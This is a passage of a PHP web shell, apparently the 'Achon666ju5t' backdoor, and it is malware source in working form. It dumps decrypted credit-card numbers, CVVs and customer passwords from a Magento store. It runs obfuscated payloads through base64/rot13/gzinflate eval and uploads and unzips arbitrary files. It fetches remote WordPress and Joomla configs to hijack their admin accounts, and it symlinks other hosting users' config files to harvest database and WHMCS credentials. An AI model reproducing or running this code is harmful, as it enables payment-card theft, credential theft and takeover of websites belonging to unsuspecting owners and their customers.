774. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
775. $Billing_Address = $vx['Billing Address'];
776. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
777. $batas = $no++;
778. }
779.  
780. while($vx2 = mysql_fetch_array($query2)){
781. $batas +=1;
782. $cc_owner = $vx2['cc_owner'];
783. $method = $vx2['method'];
784. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
785. $exp = $vx2['exp'];
786. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
787. $Billing_Address = $vx2['Billing Address'];
788. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
789. $batas++;
790. }
791.  
792. echo "</table><br>";
793. }
794. //=========================================================================================================
795. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
796. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
797.  
798.  
799. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
800. if (!$query){
801. echo "<center><b>Gagal</b></center>";
802. }else{
803. echo'<br><br>
804. ====================================================================<br>
805. [ Customer ] <br>
806. ====================================================================<br>';
807. }
808. echo "
809. <table border='1' align='center' >
810. <tr>
811. <td>no</td>
812. <td>user</td>
813. <td>pass</td>
814. </tr>";
815. $no = 1;
816. $batas = 0;
817. while($vx = mysql_fetch_array($query)) {
818. $user = $vx['email'];
819. $pass = $vx['value'];
820. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
821. $batas = $no++;
822. }
823.  
824. if(mysql_num_rows($query2) != 0 && ($query2)){
825. while($vx2 = mysql_fetch_array($query2)){
826. $user = $vx2['customer_email'];
827. $pass = $crypto->decrypt($vx2['password_hash']);
828. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
829. $batas +=1;
830. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
831. $batas++;
832. }
833. }
834. }
835.  
836. echo "</table><br>";
837. }
838. //=========================================================================================================
839. }
840. }
841. function save($format,$data){
842. $fp = fopen($format, 'a');
843. fwrite($fp, $data);
844. fclose($fp);
845. }
846. function cekbase64($string){
847. $decoded = base64_decode($string, true);
848. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
849. if(!base64_decode($string, true)) return false;
850. if(base64_encode($decoded) != $string) return false;
851. return true;//nilai return 1 jika true
852. }
853. //----untuk decode password ---/
854. class Varien_Crypt_Mcrypt{
855. /**
856. * Constuctor
857. *
858. * @param array $data
859. */
860. public function __construct()
861. {
862. }
863.  
864. /**
865. * Initialize mcrypt module
866. *
867. * @param string $key cipher private key
868. * @return Varien_Crypt_Mcrypt
869. */
870. public function init($key)
871. {
872. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
873. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
874. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
875.  
876. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
877. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
878. return null;
879. }
880.  
881. mcrypt_generic_init($this->handler, $key, $iv);
882.  
883. return $this;
884. }
885.  
886. /**
887. * Encrypt data
888. *
889. * @param string $data source string
890. * @return string
891. */
892. public function encrypt($data)
893. {
894. if (!$this->handler) {
895. //throw new Varien_Exception('Crypt module is not initialized.');
896. return null;
897. }
898. if (strlen($data) == 0) {
899. return $data;
900. }
901. return base64_encode(mcrypt_generic($this->handler, $data));
902. }
903.  
904. /**
905. * Decrypt data
906. *
907. * @param string $data encrypted string
908. * @return string
909. */
910. public function decrypt($data)
911. {
912. if (!$this->handler) {
913. //throw new Varien_Exception('Crypt module is not initialized.');
914. return null;
915. }
916. if (strlen($data) == 0) {
917. return $data;
918. }
919. return mdecrypt_generic($this->handler, base64_decode($data));
920. }
921.  
922.  
923. /**
924. * Desctruct cipher module
925. *
926. */
927. public function __destruct()
928. {
929. if ($this->handler) {
930. $this->_reset();
931. }
932. }
933.  
934. protected function _reset()
935. {
936. mcrypt_generic_deinit($this->handler);
937. mcrypt_module_close($this->handler);
938. }
939. }
940. }
941. elseif($_GET['do'] == 'zip') {
942. echo "<center><h1>Zip Menu</h1>";
943. function rmdir_recursive($dir) {
944. foreach(scandir($dir) as $file) {
945. if ('.' === $file || '..' === $file) continue;
946. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
947. else unlink("$dir/$file");
948. }
949. rmdir($dir);
950. }
951. if($_FILES["zip_file"]["name"]) {
952. $filename = $_FILES["zip_file"]["name"];
953. $source = $_FILES["zip_file"]["tmp_name"];
954. $type = $_FILES["zip_file"]["type"];
955. $name = explode(".", $filename);
956. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
957. foreach($accepted_types as $mime_type) {
958. if($mime_type == $type) {
959. $okay = true;
960. break;
961. }
962. }
963. $continue = strtolower($name[1]) == 'zip' ? true : false;
964. if(!$continue) {
965. $message = "Itu Bukan Zip , , GOBLOK COK";
966. }
967. $path = dirname(__FILE__).'/';
968. $filenoext = basename ($filename, '.zip');
969. $filenoext = basename ($filenoext, '.ZIP');
970. $targetdir = $path . $filenoext;
971. $targetzip = $path . $filename;
972. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
973. mkdir($targetdir, 0777);
974. if(move_uploaded_file($source, $targetzip)) {
975. $zip = new ZipArchive();
976. $x = $zip->open($targetzip);
977. if ($x === true) {
978. $zip->extractTo($targetdir);
979. $zip->close();
980.  
981. unlink($targetzip);
982. }
983. $message = "<b>Sukses Gan :)</b>";
984. } else {
985. $message = "<b>Error Gan :(</b>";
986. }
987. }
988. echo '<table style="width:100%" border="1">
989. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
990. <label>Zip File : <input type="file" name="zip_file" /></label>
991. <input type="submit" name="submit" value="Upload And Unzip" />
992. </form>';
993. if($message) echo "<p>$message</p>";
994. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
995. if($_POST['backup']){
996. $save=$_POST['save'];
997. function Zip($source, $destination)
998. {
999. if (extension_loaded('zip') === true)
1000. {
1001. if (file_exists($source) === true)
1002. {
1003. $zip = new ZipArchive();
1004.  
1005. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
1006. {
1007. $source = realpath($source);
1008.  
1009. if (is_dir($source) === true)
1010. {
1011. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
1012.  
1013. foreach ($files as $file)
1014. {
1015. $file = realpath($file);
1016.  
1017. if (is_dir($file) === true)
1018. {
1019. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
1020. }
1021.  
1022. else if (is_file($file) === true)
1023. {
1024. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
1025. }
1026. }
1027. }
1028.  
1029. else if (is_file($source) === true)
1030. {
1031. $zip->addFromString(basename($source), file_get_contents($source));
1032. }
1033. }
1034.  
1035. return $zip->close();
1036. }
1037. }
1038.  
1039. return false;
1040. }
1041. Zip($_POST['dir'],$save);
1042. echo "Done , Save To <b>$save</b>";
1043. }
1044. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
1045. if($_POST['extrak']){
1046. $save=$_POST['save'];
1047. $zip = new ZipArchive;
1048. $res = $zip->open($_POST['dir']);
1049. if ($res === TRUE) {
1050. $zip->extractTo($save);
1051. $zip->close();
1052. echo 'Succes , Location : <b>'.$save.'</b>';
1053. } else {
1054. echo 'Gagal Mas :( Ntahlah !';
1055. }
1056. }
1057. echo '</tr></table>';
1058. }
1059. elseif($_GET['do'] == 'shellchk') {
1060. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
1061. } elseif($_GET['do'] == 'loghunter')
1062. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
1063. elseif($_GET['do'] == 'metu') {
1064.  
1065.  
1066. echo '<form action="?dir=$dir&do=metu" method="post">';
1067. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1068. echo 'Byee !';
1069.  
1070. }
1071. elseif($_GET['do'] == 'about') {
1072.  
1073. echo '<center>Achon666ju5t - Extreme Crew';
1074.  
1075. }
1076. elseif($_GET['do'] == 'auto_cu_wp') {
1077. if($_POST['gass']) {
1078. echo "<center><h1>WordPress Auto Change User 2</h1>
1079. <form method='post'>
1080. Link Config: <br>
1081. <textarea name='link' style='width: 450px; height:250px;'>";
1082. UrlLoop($_POST['linkconf'],'wordpress');
1083. echo"</textarea><br>
1084. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
1085. </form></center>";
1086. } else {
1087. echo "<center><h1>WordPress Auto Change User 2</h1>
1088. <form method='post'>
1089. Link Config: <br>
1090. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/chonx_symconf/'><br>
1091. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1092. </form></center>";
1093. }
1094. if($_POST['auto_cu_wp']) {
1095.  
1096. function anucurl($sites) {
1097. $ch = curl_init($sites);
1098. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1099. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1100. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1101. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1102. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1103. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1104. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1105. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1106. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1107. $data = curl_exec($ch);
1108. curl_close($ch);
1109. return $data;
1110. }
1111. $link = explode("\r\n", $_POST['link']);
1112. $user = "achonx";
1113. $pass = "achonx";
1114. $passx = md5($pass);
1115. foreach($link as $dir_config) {
1116. $config = anucurl($dir_config);
1117. $dbhost = ambilkata($config,"DB_HOST', '","'");
1118. $dbuser = ambilkata($config,"DB_USER', '","'");
1119. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1120. $dbname = ambilkata($config,"DB_NAME', '","'");
1121. $dbprefix = ambilkata($config,"table_prefix = '","'");
1122. $prefix = $dbprefix."users";
1123. $option = $dbprefix."options";
1124. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1125. $db = mysql_select_db($dbname);
1126. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1127. $result = mysql_fetch_array($q);
1128. $id = $result[ID];
1129. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1130. $result2 = mysql_fetch_array($q2);
1131. $target = $result2[option_value];
1132. if($target == '') {
1133. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1134. } else {
1135. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
1136. }
1137. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1138. if(!$conn OR !$db OR !$update) {
1139. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1140. mysql_close($conn);
1141. } else {
1142. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1143. echo "[+] username: <font color=lime>$user</font><br>";
1144. echo "[+] password: <font color=lime>$pass</font><br><br>";
1145.  
1146. mysql_close($conn);
1147. }
1148. }
1149. }
1150.  
1151. }
1152. elseif($_GET['do'] == 'auto_cu_joomla') {
1153. if($_POST['gass']) {
1154. echo "<center><h1>Joomla Auto Change User 2</h1>
1155. <form method='post'>
1156. Link Config: <br>
1157. <textarea name='link' style='width: 450px; height:250px;'>";
1158. UrlLoop($_POST['linkconf'],'joomla');
1159. echo"</textarea><br>
1160. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
1161. </form></center>";
1162. } else {
1163. echo "<center><h1>Joomla Auto Change User 2</h1>
1164. <form method='post'>
1165. Link Config: <br>
1166. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/chonx_symconf/'><br>
1167. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1168. </form></center>";
1169. }
1170. if($_POST['auto_cu_joomla']) {
1171.  
1172. function anucurl($sites) {
1173. $ch = curl_init($sites);
1174. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1175. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1176. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1177. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1178. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1179. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1180. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1181. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1182. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1183. $data = curl_exec($ch);
1184. curl_close($ch);
1185. return $data;
1186. }
1187. $link = explode("\r\n", $_POST['link']);
1188. $user = "achonx";
1189. $pass = "achonx";
1190. $passx = md5($pass);
1191. foreach($link as $dir_config) {
1192. $config = anucurl($dir_config);
1193. $dbhost = ambilkata($config,"host = '","'");
1194. $dbuser = ambilkata($config,"user = '","'");
1195. $dbpass = ambilkata($config,"password = '","'");
1196. $dbname = ambilkata($config,"db = '","'");
1197. $dbprefix = ambilkata($config,"dbprefix = '","'");
1198. $prefix = $dbprefix."users";
1199. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1200. $db = mysql_select_db($dbname);
1201. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1202. $result = mysql_fetch_array($q);
1203. $id = $result['id'];
1204. $site = ambilkata($config,"sitename = '","'");
1205. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
1206. echo "Config => ".$dir_config."<br>";
1207. echo "CMS => Joomla<br>";
1208. if($site == '') {
1209. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1210. } else {
1211. echo "Sitename => $site<br>";
1212. }
1213. if(!$update OR !$conn OR !$db) {
1214. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1215. } else {
1216. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
1217. }
1218. mysql_close($conn);
1219. }
1220. }
1221. }
1222. elseif($_GET['do'] == 'symconfig') {
1223. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
1224. echo '<script>alert("Skid this won\'t work on Windows")</script>';
1225. exit;
1226. }
1227. else
1228. {
1229. if($_POST["m"] && !$_POST["passwd"]==""){
1230. @mkdir("chonx_symconf", 0777);
1231. @chdir("chonx_symconf");
1232. @symlink("/","root");
1233. $htaccess="Options Indexes FollowSymLinks
1234. DirectoryIndex janchonx.htm
1235. AddType text/plain .php
1236. AddHandler text/plain .php
1237. Satisfy Any";
1238. @file_put_contents(".htaccess",$htaccess);
1239. $etc_passwd=$_POST["passwd"];
1240. $etc_passwd=explode("\n",$etc_passwd);
1241. foreach($etc_passwd as $passwd){
1242. $pawd=explode(":",$passwd);
1243. $user =$pawd[0];
1244.  
1245. @symlink('/','chonx_symconf/root');
1246. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1247. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1248. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1249. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1250. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1251. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1252. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1253. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1254. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1255. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1256. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1257. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1258. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1259. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1260. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1261. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1262. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1263. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1264. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1265. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1266. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1267. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1268. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1269. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1270. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1271. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1272. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1273. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1274. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1275. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1276. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1277. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1278. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1279. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1280. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1281. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1282. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1283. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1284. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1285. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1286. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1287. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1288. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1289. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1290. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1291. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1292. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1293. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1294. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1295. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1296. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1297. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1298. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1299. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1300. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1301. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1302. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1303. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1304. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1305. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1306. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1307. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1308. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1309. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1310. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1311. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1312. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1313. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1314. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1315. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1316. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1317. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1318. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1319. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1320. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1321. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1322. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1323. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1324. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1325. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1326. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1327. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1328. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1329. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1330. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1331. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1332. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1333. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1334. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1335. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1336. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1337. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1338. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1339. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
